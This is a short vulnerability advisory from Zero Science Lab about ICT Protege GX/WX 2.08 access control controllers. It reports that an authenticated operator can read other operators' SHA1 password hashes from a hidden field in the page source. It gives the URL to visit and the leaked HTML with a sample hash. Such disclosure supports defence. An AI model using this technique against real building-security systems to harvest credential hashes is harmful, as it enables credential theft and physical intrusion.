# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure# Exploit Author: LiquidWorm
Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver:2.08.1002 K1B3
Lib:04.00.217
Int:2.3.235.J013
OS:2.0.20
WX: Ver:4.00284 H062
App:02.08.766
Lib:04.00.169
Int:02.2.208
Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.
Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.
Tested on: Microsoft-WinCE/6.00
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php
08.02.2022--
Navigate to http://CONTROLLER_IP/operator.htm
Source:<p><label id="OperatorPassword">Password</label><inputtype="password"id="Password" value=""class="narrow" readonly=""><inputtype="button"id="ButtonChangeOperatorPassword"class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>......<inputtype="hidden"id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">...
